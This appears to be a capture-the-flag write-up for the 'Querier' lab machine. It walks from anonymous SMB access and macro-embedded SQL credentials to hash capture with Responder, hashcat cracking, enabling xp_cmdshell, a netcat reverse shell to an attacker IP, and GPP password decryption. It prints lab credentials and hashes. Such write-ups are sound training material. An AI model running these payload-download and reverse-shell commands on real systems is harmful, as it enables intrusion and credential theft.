Summary
This was an amazing machine that involved insecure file sharing services that provided credentials for an SQL server connection and basic shell. From here we pursued the classic xp_cmdshell. However permissions were denied on the xp_cmdshell and we had to utilize responder and dir/file tree to bypass the permissions by creating a rogue SMB server and forcing the mssql server authentication to our rogue server capturing the hash. From here we landed a reverse shell using command injection for an initial foothold and enumerating with winpeas and powerup. This flagged the gpo history where we found a group policy xml template with a password hash that we cracked for administrator.
Processes/Techniques
Anonymous file login
File forensics
Excel macro extraction
SQL dir/file tree permission bypass
SQL xp_cmdshell
GPO history enumeration
Reverse shell
Tools used
Impacket-mssql
Impacket-psexec
Binwalk
Winpeas
Powerup
Hashcat
Gpp Decrypt
Nishang
Impacket-SMB Server
Python simple server
Wget
Responder
Hash identifier
References
Enumeration
We start off with a simple enumeration to get a quick snapshot of what we are working with. We initially see ports for a file share and SQL service. There is no web port so we can assume we must dive deep into SQL, file share or both.
Taking our enumeration a little further we scan the target machine using the nmap default scripts with -sC and the the nmap service enumeration scripts with -sV.
We gather the host and domain FQDN names and SQL version.
File share enumeration
Let's jump into file share enumeration using the smbclient unix script that can make a connection to smb file shares from a linux host.
smbclient -L 10.129.1.147
We initially are presented with several hidden shares that are unlikely to reveal anything, or have the permissions we require. The final share however "Reports" is not a default share name and therefore does not have default and native permissions.
Connecting into the folder with the classic anonymous login and we see the 'Currency Volume Reports.xlsm' file.
We immediately attempt to download this file with the classic mget and get commands of which neither work. Upon further investigation we list all available commands and clearly see that mget is listed. Taking a closers look, the error message from mget stated it could not find the file 'Currency' which suggests it is not capturing the whole file name due to white spaces.
So we append single quotes around the file name without success. When appending double quotes however we achieve a file download.
File Forensics
Because the file Report.xlsm stuck out like a sore thumb I jumped into forensics right away to understand what it's purpose in the lab was. Running the file command shows us it is a Excel 2007 file. Although we could actually open this in excel I am instead going to check it for hidden files because my intuition is telling me to.
Running binwalk immediately revealed hidden content in the file.
Here we find the extracted file and we notice a macro titled 'vbaProject.bin' which we want to investigate right away.
Running cat on the file we see a large amount of content. Parsing through it all we find some valuable information within,
DB = volume
Uid = reporting
Pwd = PcwTWTHRwryjc$c6
Server=Querier
SQL Connection
From here we are able to pivot into the impacket suite where we can utilize mssqlclient to make that initial connection with our newly found credentials.
python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc$c6@10.129.1.147
This however kept erroring out, so I finally escapted the $ character and it worked.
python3 mssqlclient.py -windows-auth reporting:PcwTWTHRwryjc\$c6@10.129.1.147
xp_cmdshell
The xp_cmdshell literally spawns a command shell and accepts strings to execute as arguments. This is normally restricted or locked down on a system but is a common CTF target.
Here is a little guide below on the xp_cmdshell. Unfortunately it is not that easy as we can see that we do not have the needed permissions to pass commands to xp_cmdshell.
https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15
Researching this permissions error, leads me to the below resource which provides instructions on enabling the xp_cmdshell.
Reference:
The steps are shown below;
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
Man in the middle
Researching and diving into the forums it became clear that permisions are often deployed to protect these systems there are infact may ways to circumvent such initial and basic permissions. Trust wave released an amazing article on this below. I tried many of the techniques and the one which finally worked was MITM method leveraging responder to capture the hash from the SQL auth push to a spoofed SMB server, through the use of the SQL function dirtree.
Reference; cmd_shell bypass techniques
Reference: Actual use of the command
So I spun up a responder server
[SMB] NTLMv2-SSP Client : 10.129.1.147
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:0e22bb333ed6c738:DE7F38F1DDF8DD5FBA04A659336A3822:010100000000000000EF18ABDBBFD7010EC138EF9A8EAE980000000002000800380037005A00540001001E00570049004E002D004F0059004F0055005600420053004E0035003400430004003400570049004E002D004F0059004F0055005600420053004E003500340043002E00380037005A0054002E004C004F00430041004C0003001400380037005A0054002E004C004F00430041004C0005001400380037005A0054002E004C004F00430041004C000700080000EF18ABDBBFD701060004000200000008003000300000000000000000000000003000005E57E89B872A66568CA654F48A9F822F9F6C264FA7A76FC823989A4D664D37FD0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0035003800000000000000000000000000
[*] Skipping previously captured hash for QUERIER\mssql-svc
Can't crack the hash
I was not able to crack the hash by copying and pasting it into a file. This is because the hash is actually several blocks in length so we have to use an out file natively prepared by responder found in ./usr/share/responder/logs/SMB-NTLMV2-SSP-10.129.1.147.exe
└─$ hashcat -m 5600 SMB-NTLMv2-SSP-10.129.1.147.txt ../../../../usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-10750H CPU @ 2.60GHz, 1423/1487 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 3 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache building ../../../../usr/share/wordlists/rockyou.txt: 33553434 bytDictionary cache built:
* Filename..: ../../../../usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
MSSQL-SVC::QUERIER:0e22bb333ed6c738:de7f38f1ddf8dd5fba04a659336a3822:010100000000000000ef18abdbbfd7010ec138ef9a8eae980000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568
MSSQL-SVC::QUERIER:6bb09e5dda6a6844:5d8db413486b66f641195d5199db73bd:010100000000000000ef18abdbbfd701cfd5055faf915ecb0000000002000800380037005a00540001001e00570049004e002d004f0059004f0055005600420053004e0035003400430004003400570049004e002d004f0059004f0055005600420053004e003500340043002e00380037005a0054002e004c004f00430041004c0003001400380037005a0054002e004c004f00430041004c0005001400380037005a0054002e004c004f00430041004c000700080000ef18abdbbfd701060004000200000008003000300000000000000000000000003000005e57e89b872a66568ca654f48a9f822f9f6c264fa7a76fc823989a4d664d37fd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0035003800000000000000000000000000:corporate568
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SMB-NTLMv2-SSP-10.129.1.147.txt
Time.Started.....: Wed Oct 13 03:36:29 2021 (13 secs)
Time.Estimated...: Wed Oct 13 03:36:42 2021 (0 secs)
Guess.Base.......: File (../../../../usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1313.0 kH/s (1.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 17920000/28688770 (62.46%)
Rejected.........: 0/17920000 (0.00%)
Restore.Point....: 8957952/14344385 (62.45%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: correita.54 -> cornbread3
Started: Wed Oct 13 03:36:06 2021
Stopped: Wed Oct 13 03:36:44 2021
Privileged SQL login
Using the username and password I attempted to login but this did not work. I receieved an error that the login was from an unstrusted Domain. I thought about this for a minute and clued it I would likely need to add the host, to our /etc/hosts file in order to be recognized and therefore trusted as a safe host mapping.
mssql-svc
corporate568
After adding querier.htb to our /etc/hosts file. I proceeded to connect to the host by using the forward lookup name @querier.htb.
From here I proceeded to test the xp_cmdshell command and was denied access. However I know that this user probably has higher permissions given it is the SQL service account. So going back and referencing the trustwave article I am able to enable cmdshell and execute commands.
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
Reverse shell
File transfer of netcat with powershell wget
xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe
From here I proceeded to execute nc64.exe and pass arguments for a reverseshell.
xp_cmdshell nc64.exe -e cmd 10.10.14.27 6363
This however was not working so I decided to download the file to a defined location and calling from that defined location.
xp_cmdshell powershell wget http://10.10.14.27:8000/nc64.exe -o C:\Users\mssql-svc\Downloads\nc64.exe
xp_cmdshell C:\Users\mssql-svc\Downloads\nc64.exe -e cmd 10.10.14.27 6363
Root
From here I uploaded winpeas.exe as usual, however it did not work so I back tracked to the .bat version. First I file transferred with
xp_cmdshell powershell wget http://10.10.14.27:8000/winPEAS.bat -o C:\Users\mssql-svc\Downloads\winPEAS.bat
I was able to run the script with
winPEAS.bat
But wait! Juicy potatoe does not work on server 2019 and newer, and we are running server 2019.
Upon seeing the password, I immediately elevate my shell to powershell by simply typing powershell. From here I retrieved the file and proceeded to pass the hash found within the .xml.
C:\Users\All Users\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups> type Groups.xml
type Groups.xml
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
PS C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups>
CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ
Researching Group Policy Passwords lead me to a broader understanding and a decryption tool.
https://www.kali.org/tools/gpp-decrypt/
MyUnclesAreMarioAndLuigi !! 1!
Comments